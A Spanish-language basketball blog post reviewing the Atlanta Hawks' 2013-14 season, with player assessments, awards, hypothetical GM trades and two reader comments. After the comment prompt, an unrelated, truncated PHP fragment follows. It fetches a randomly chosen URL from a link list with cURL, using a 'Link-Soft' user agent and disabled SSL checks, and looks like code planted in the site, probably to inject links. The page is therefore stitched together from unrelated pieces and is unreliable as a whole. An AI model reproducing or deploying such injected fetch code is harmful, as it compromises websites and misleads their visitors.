Atlanta Hawks: Bien

09 de July de 2014 por Ruxixon

Un año más Atlanta se ha apuntado a los PO pero no habría que olvidar que sus 38 victorias y 44 derrotas (8º y clavando nuestros pronósticos) sólo tienen premio en una conferencia como la del Este. De hecho se podría decir que lograron la clasificación prácticamente sin quererlo. “Nuestra meta no es ser octavos” decía Danny Ferry, GM del equipo, cuando la batalla por los playoffs entraba en su recta final. Probablemente ignoraba la conexión que en la serie contra Indiana se iba a establecer entre los aficionados y su equipo, algo muy importante para respaldar este nuevo ciclo. Los Hawks se quedaron muy cerca de derrotar a los bipolares Pacers, muy superiores sobre el papel, y liderados por Paul Millsap y Jeff Teague (nacido en Indiana) gozaron de hasta 2 match ball, cuando en el 4º y 6º partido entraron con ventaja en los minutos finales, pero finalmente los de Vogel evitaron la sorpresa en 7 partidos.

Mucho antes, la preseason estuvo protagonizada por la confirmación del cambio de ciclo iniciado con el traspaso de Joe Johnson 1 año atrás. Nuevo entrenador, Buldehonzer, ex-asistente de Popovich en los Spurs, y el último miembro de la vieja guardia, Josh Smith, que buscaba nuevos retos y firmaba por los Pistons dejando atrás 9 temporadas en el Atlanta. Con Al Horford como nuevo jugador franquicia y 5 perenne –a pesar de que año tras año se habla de que su posición es la de 4-, el equipo acumuló un ilusionante 16-13 en los primeros compases de la competición pero cuando el dominicano probablemente estaba cuajando la mejor temporada de su carrera llegó esa lesión en el músculo pectoral derecho, algo que le llevaría a estar apartado de las pistas durante toda la temporada. Millsap, recién llegado de Utah, no sólo se vio sustituyendo a Josh Smith sinó que además tuvo que suplir la importante baja del nuevo jugador franquicia. Hay que decir a su favor que respondió con creces a las exigencias que la pintura de los Hawks demandaba. Además la temporada tuvo el aliciente de ver consolidado a un jugador como Jeff Teague, con la mili hecha en Atlanta a pesar de las dudas (y el interés de Milwaukee) de principios de temporada de la franquicia, y parece adueñarse del puesto de PG para los próximos años. De la capacidad para mejorar su toma de decisiones y reducir las pérdidas en los momentos calientes de los partidos dependerá que no pierda ese status. 

Entre el resto de la plantilla un grupo de secundarios dejaron buenas sensaciones. Empezamos por Kyle Korver, que es la punta de lanza de un equipo que tiene el triple como menú principal en su libro de jugadas. Partido a partido ha dejado el récord de encuentros consecutivos anotando al menos un triple en 127, superando en estos menesteres a Dana Barros. Mucho se ha comentando de las posibles distracciones de este logro pero afortunadamente no impidió que se clasificaran para PO y ahí queda para la posteridad, hasta que otra muñequita caliente se anime. En la posición de SF, DeMarre Carroll. Lejos de ser un virtuoso de este deporte es de ese tipo de jugadores que con su entrega compensan cualquier falta de talento y ha aportado cierta solidez defensiva al equipo. Cualquier entrenador quiere jugadores así. Desde el banquillo, destacaron Mike Scott, Shelvin Mack y Louis Williams. De los 2 primeros sólo se pueden decir cosas buenas, rindiendo bastante por encima de los dólares que figuran en su contrato. Mientras Scott ha jugado buenos minutos como microondas en el PF (muy buena su serie contra Indiana) siendo uno de los favoritos de la afición, Mack se ha ganado un hueco en los Hawks como un buen PG suplente. Respecto a Louis Williams, se cierne sobre él la sensación de que las lesiones han reducido su impacto en la NBA. Entra en un año importante pues tendrá que ganarse un nuevo contrato así que podríamos estar ante el resurgimiento de aquel jugador de los 76ers.

La temporada nos deja también a un ilustre Elton Brand que apura sus últimos días en la liga y que probablemente el tiempo que le quede lo pasará entre firmas por el mínimo en contenders. Dennis Schröeder ha sufrido el vertiginoso salto que supone pasar de la liga alemana a la NBA pero teniendo en cuenta su juventud aún goza de la confianza de que puede convertirse en un sólido activo saliendo desde el banquillo. Menos complicado fue el año de otro de los rookies de los Hawks, Pero Antic, que a sus 31 primaveras ha jugado bastantes noches como 5 titular por las consabidas lesiones. Por último comentar la firma a mitad de temporada de Mike Muscala que dejó al Obradoiro sin uno de sus jugadores fundamentales y con un buen saco de dinero como compensación. Veremos cuál es su papel la próxima temporada.

PREMIOS

MVP: No es fácil llegar a un equipo y solventar las ausencias de los 2 jugadores franquicia. Paul Millsap se ha visto en esa tesitura y ha respondido con 17.9 puntos y 8.5 rebotes, amén de una mejora de esos números en la serie contra los Pacers. Gran temporada para él.

Rookie: Se hace difícil hablar de rookie en un jugador de 31 años. No menos complicado es hablar de un center que tira más de 3 que de 2. Pero Antic ha aprovechado en parte los muchos minutos que ha jugado esta temporada para hacerse un hueco en la liga.

Sorpresa: Pick 13 de la segunda ronda del draft del 2012. 24 años en su año rookie y dudas acerca de su potencial para progresar. Mike Scott ha sido uno de los jugadores más importantes del equipo saliendo desde el banquillo y en el doble de partidos que en su primera temporada ha doblado su promedio anotador.

Decepción: Si bien sigue el orden lógico, siempre es una pena ver a Elton Brand, otrora conocido como “Mr.20-10“, ir bajando prestaciones. Este año 5.7 puntos y 4.9 rebotes de media.

Esfuerzo en vano: Ver que estás dando lo mejor de tu carrera y que de repente, tu cuerpo dice basta debe ser frustrante. De ahí este “premio”. Esperemos que haya cubierto el cupo de lesiones y se pueda ver al fin un Al Horford totalmente sano en el futuro.

JUGANDO A SER GM

A estas alturas hemos seleccionado en el draft a Adreian Payne, procedente de Michigan State, un PF con tendencia a mirar de cara a la canasta, flojo en defensa pero muy buena mano, característica fundamental que Buldehonzer busca en su plantel. Las elecciones de segunda ronda son Walter Tavares (queremos que siga en España de cara a un posible salto en 1 o 2 temporadas) y Lamar Patterson. Además hemos traspasado  a Louis Williams y los derechos de Lucas Nogueira, por John Salmons de los Toronto Raptors. Su contrato es parcialmente garantizado, así que lo cortamos y sólo nos cuenta 1 millón para nuestro CAP. Con las firmas de Payne y Patterson disponemos antes de entrar en la FA de aproximadamente 18 millones libres, contando con que el nuevo CAP ronde los 62 millones.

El equipo es mejorable en las posiciones de escolta y alero así que nos movemos para lograr alguna  mejora ahí. Goran Dragic ha hecho su mejor  temporada en Phoenix y creo que se adapta a Jeff Teague en el backcourt del equipo, como hizo con Bledsoe. Dragic es buen tirador, nos da un plus en defensa y es un poco más seguro amasando la bola en los minutos decisivos. El problema de este traspaso es que Dragic está en su valor más alto desde que está en la NBA, y aunque Millsap es un gran jugador para ellos, no hay que olvidar que está en su último año de contrato, así que habría que edulcorar lo que les ofrecemos (tampoco hay que olvidar la PO de Dragic, que si sigue con su rendimiento seguro buscaría un mejor contrato). Para ello ofrecemos a Phoenix el pack Millsap + 1ª ronda 2015 (la peor entre Hawks y Nets) por Dragic. Ganamos 2 millones más para nuestra FA debido a la diferencia entre los contratos de Millsap y Dragic.

En la FA apuntamos con bala a Greg Monroe, si conseguimos hacerle un contrato como a Al Horford fenomenal, pero siempre podemos ir apurando hasta el máximo. Dudo que Detroit iguale en esos términos. Debilitamos así a uno de nuestros rivales en la conferencia y aumentamos nuestras opciones con un juego interior como pocos hay en el Este. Horford tiene un tirito de media distancia muy interesante mientras que Monroe te da juego al poste bajo. Quizás no sea una dupla demasiada dura atrás, si bien Horford es un más que decente defensor. Con el CAP restante renovamos a Mack y a Mike Scott en contratos multianuales, e intentamos que los Hornets se duerman en la Summer League adelantándonos en la firma de Bachynski. Su altura y envergadura nos dan más garantías para ese perfil de center defensivo que buscamos (4 tapones de media en 33 partidos), y es un mejor fit con Scott o Payne. No sería descabellado que en muchos partidos estuviera por delante de Antic en la rotación.

PG: Jeff Teague, Shelvin Mack, Schröeder.
SG: Goran Dragic, Kyle Korver, John Jenkins.
SF: DeMarre Carroll, Lamarr Patterson.
PF: Al Horford, Adreian Payne, Mike Scott, Mike Muscala.
C: Greg Monroe, Jordan Bachynski, Pero Antic.

Comenta

2 comentarios a esta entrada

  1. jhc dice:
    #1

    Buena temporada de mis Hawks pero no los veo trayendo a Goran Dragic sus esfuerzos más bien van en torno a Deng-Monroe

      Citar

  2. rumbero dice:
    #2

    jhc:
    Buena temporada de mis Hawks pero no los veo trayendo a Goran Dragic sus esfuerzos más bien van en torno a Deng-Monroe

    Yo me quedo con el equipo de Ruxixón, pero si parece que van a ir fuerte a por Deng y la verdad es que sería muy buena pieza para el backcourt con Teague, Sefolosha y Korver. Muy versátil y más con la mano de Budenholzer. Me quedo con como se las ha apañado con un equipo “justito”, sin Horford media temporada y muchos problemas en el puesto de escolta. No hay nada como pasar por los Spurs

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>